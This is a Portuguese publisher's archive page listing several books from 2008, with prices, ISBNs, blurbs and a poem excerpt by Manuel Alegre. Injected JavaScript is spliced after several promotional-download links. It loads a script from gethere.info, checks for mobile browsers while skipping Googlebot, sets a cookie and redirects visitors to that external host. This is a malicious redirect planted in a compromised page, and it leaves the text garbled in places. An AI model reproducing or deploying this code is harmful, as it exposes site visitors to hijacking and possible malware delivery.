Archive for 2008

O Breve Sentimento do Eterno
Nuno Júdice

NJ_BreveSentimentoEterno

Colecção: Mil Horas de Leitura, n.º 6
Formato: 13,5×20,9
N.º Págs. 100
Preço com IVA: €15,00
ISBN: 978-989-95597-8-3
EAN: 9789899559783

Um novo livro de poesia de Nuno Júdice, um dos nossos mais importantes poetas contemporâneos. Um livro que tem a singularidade de reproduzir, lado a lado, e datar, os textos manuscritos de todos os 41 poemas nele incluídos. Mostrando assim, de certa maneira, o trabalho e a agilidade da sua escrita.

Descarregue a folha de promoção Promo_OBreveSentimentoDoEterno.pdfs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sete Partidas, poema
Manuel Alegre

MA_SetePartidas

Colecção: Mil Horas de Leitura, n.º 4
2.ª Edição
Formato: 13,5×20,9
N.º Págs. 48
Preço com IVA: €9,00
ISBN: 978-989-95597-6-9
EAN: 9789899559769

Sete Partidas é um poema inédito de Manuel Alegre, dividido em 12 partes, com o qual se inicia nesta Colecção a publicação de textos de poesia, lado a lado com a prosa de ficção.




PARTE 12

Um poema escreve-se entre a noite e a manhã
quando as águas irrompem na memória
e sob a página deixam a branca espuma
de um amor já distante um rosto um resto
um rasto um cheiro um som coisa nenhuma.

Caminha-se de encontro ao desencontro
e mesmo quando há ganho vem a perda
o segredo da História é o momento em que
tudo podia ser diferente. E o poema escreve-se
nesse breve senão. Para que dele fique

um tinir de cristal um fogo fátuo um eco
mesmo que não seja mais do que um virar
de página um imperceptível movimento
um acaso um se um mas que muda a vida.
E o poema é esse nada esse momento.

Até ao último instante D. Pedro espera
por Henrique e João. Mas Henrique não cumpre
e João morre de febres. Já ninguém se lhe junta.
Que futuro se foi com essas febres?
O poema será sempre essa pergunta.

Descarregue a folha de promoção Promo_SetePartidas.pdf} else {

Infância, Quando Eles Eram Pequeninos
Sarah Adamopoulos

SA_Infancia

Colecção: Outras Direcções, n.º 1
Prefácio: António Barreto
Formato 15,5×23
N.º Págs. 232
Preço com IVA €20,00
ISBN: 978-989-95597-2-1
EAN: 9789899559721

Depoimentos de: Alice Geirinhas, artista plástica; André Gago, actor; António Mega Ferreira, escritor; António Melo, actor; António Vitorino D’almeida, maestro; Baptista-Bastos, jornalista, escritor; Carlos Do Carmo, fadista; Carlos Vaz Marques, jornalista; Eduardo Prado Coelho, professor, ensaísta; Filipa Melo, jornalista, escritora; Glicínia Quartin, actriz; Inês De Medeiros, actriz; Isabel Stilwell, jornalista; João Brites, encenador; João D’ávila, actor; Jorge Silva Melo, encenador; José Bandeira, cartoonista; José Couto Nogueira, jornalista e escritor; José Formosinho Sanchez, médico obstetra; Leonel Moura, artista plástico; Manuel Da Silva Ramos, escritor; Marcelo Rebelo de Sousa, professor; Margarida Pinto Correia, jornalista; Mário de Carvalho, escritor; Michel, músico e bailarino; Nuno Júdice, poeta; Nuno Rebelo, músico; Pedro Sena Nunes, realizador; Raul Solnado, actor; Rogério Ribeiro, pintor; Rui Reininho, cantor; Serge Tréfaut, documentarista; Vicente Jorge Silva, jornalista; Zé Pedro, músico.

*

Todas as infâncias portuguesas acontecidas no século XX têm em comum o facto de se terem cruzado, duma ou doutra forma, com a marcha recente do país e do mundo. As Guerras mundiais, a Guerra de Espanha, a Guerra Colonial, a Guerra Fria, o advento da televisão,
o Homem na Lua, o fim da ditadura em Portugal, as tecnologias pré-digitais e, naturalmente,
o início da globalização. É destas infâncias que nos fala este livro, pela voz de 34 personalidades públicas ou com percursos que cruzam a vida pública portuguesa. Vivências
e práticas diversas, que nos fazem olhar diferentemente para as circunstâncias da infância,
e nos ajudam a compreender e a educar as nossas crianças.

É este o resultado. “Atraente e estranho” – como diz António Barreto no Prefácio.

Descarregue a folha de promoção Promo_Infância.pdf}

Lavagante, Encontro Desabitado
José Cardoso Pires

JCP_Lavagante

Colecção: Mil Horas de Leitura, n.º 1
6.ª Edição
Fixação do texto e revisão: Ana Cardoso Pires
Formato 13,5×20,9
N.º Págs. 92
Preço com IVA: €10,00
ISBN: 978-989-95597-1-4
EAN: 9789899559714

(…) Curiosidade. Pôr à prova um olhar, descobrir (melhor: verificar) um corpo que se imagina, aí está o que é a curiosidade do homem em certa altura da vida. Daniel sabia isto, conversámos sobre o assunto várias vezes. Duma delas recordo-me de o ter ouvido: – Ao fim e ao cabo, as mulheres é que escolhem o momento e os termos da ofensiva. Meditam tudo em casa e passado tempo acabam por confessar: «Naquele dia, sabes, eu tinha resolvido…» (…)

(…) naquele dia, 2 de Maio, a multidão da Baixa andava alheia aos céus e às águas luminosas do Tejo: olhava as fachadas dos edifícios salpicadas de balas. Operários dos subúrbios e casais de vida repousada desceram, curiosos, dos seus bairros para visitarem as ruas onde se tinham dado os motins da véspera. Apesar dos comunicados do Governo, apesar das patrulhas e dos quartéis armados até aos dentes, a revolta rompera no coração da cidade à hora marcada pelos microfones clandestinos (…)

(…) «Sei o que joguei, meu amor», lê-se, entre outras coisas, numa carta escrita há uma semana por Cecília. «Mas eu não podia suportar por mais tempo a ideia de estares fechado numa prisão, tu que tanto gostas de viver (…)

Este texto nunca foi publicado em livro. Uma sua primeira (?) versão, muito reduzida, foi publicada em Dezembro de1963, no n.º 11 da revista O Tempo e o Modo, pág. 30 (edição da Livraria Moraes Editores, Lisboa), com o título Um Lavagante e Outros Exemplares, com a menção, em Nota de Redacção, de que se tratava de “(…) um capítulo do seu próximo romance, ainda provisoriamente sem título”. Existem outras versões, manuscritas, sem data, uma delas com o título O Lavagante e a Mulher do Próximo. Existem algumas versões dactilografadas, também sem datas. Todas indiciam, pelas emendas, serem posteriores ao texto publicado em 1963. É também possível perceber que se trata de um texto anterior a O Delfim, publicado pela primeira vez em 1968, pela Livraria Moraes Editores. Talvez se possa concluir que se trata de um texto cujo trabalho de escrita, tal como se apresenta nesta versão final dactilografada directamente pelo Autor, foi sendo elaborado ao longo de vários anos, mais ou menos entre 1963 e 1968.

Descarregue a folha de promoção Promo_LAVAGANTE.pdfdocument.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Só Resta o Amor, contos
Agustín Fernández Paz

AFP_SoRestaAmor

Colecção Mil Horas de Leitura, n.º 3
Formato: 13,5×20,9
N.º Págs. 224
Preço com IVA: €18,00
ISBN: 978-989-95597-5-2
EAN: 9789899559752

Agustín Fernández Paz

Vilalba, Lugo, 1947.
Licenciado em Ciências da Educação.
Diplomado em Língua Galega.

Adora que lhe contem histórias. De viva voz, através das páginas de um livro, na penumbra das salas de cinema e dos teatros ou no brilho frio de um qualquer ecrã. Afirma que desde a sua infância na Galiza do pós-guerra, os livros tiveram uma presença decisiva no seu percurso. Aplica à sua vida, o que Álvaro Cunqueiro escreveu naquela época: «como quem bebe água, o homem precisa de beber sonhos».

Tinha 28 anos quando Franco morreu. Deste modo, grande parte da sua vida foi marcada pela ditadura. Tal como todas as pessoas da sua geração, afirma que chegou sempre tarde a todo o lado: aos livros que deveria ter lido, aos filmes que marcaram muitos daqueles anos… Talvez por isso existam coisas na vida que aprecia de maneira especial: a liberdade, a memória, os livros, o cinema…

Agustín acredita que as palavras possuem a força necessária para mudar o mundo e pensa que os livros são imprescindíveis para nos ajudar a sonhar e a viver. Prefere ler o que outros escrevem, mas também gosta de inventar histórias e contá-las através da escrita. Na sua vasta obra, escrita em galego, largamente premiada e em grande parte traduzida para outras línguas, salientam-se títulos como “Corredores de sombra”, “Aire negro”, “Noite de voraces sombras”, “Cuentos por palavras”, “Cartas de inverno”, “O centro do labirinto”, “O Laboratório do Doutor Nogueira”, a novela juvenil “Rapazas”, etc. – os quatro últimos já publicados em Portugal.

Este é o seu livro mais recente. Com ele a literatura galega toma lugar na nossa colecção. Uma literatura fascinante numa língua irmã.

As vidas dos personagens das histórias deste livro estão ligadas por uma teia de fios invisíveis: Diana, Sara, Pablo, Laura, Adrián… Todos se apaixonam e descobrem que o amor é um sentimento de enorme poder, capaz de os transformar por inteiro e de os fazer ver a vida com outros olhos. Mas também experimentam a amargura causada pela falta de amor, ou a ausência, ou o amor fracassado. O amor em todas as suas variantes: do primeiro amor adolescente até àquele que sobrevive à morte. E, sempre, sempre, os livros como companheiros na aventura de amar.

Descarregue a folha de promoção Promo_SoRestaAmor.pdfs.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;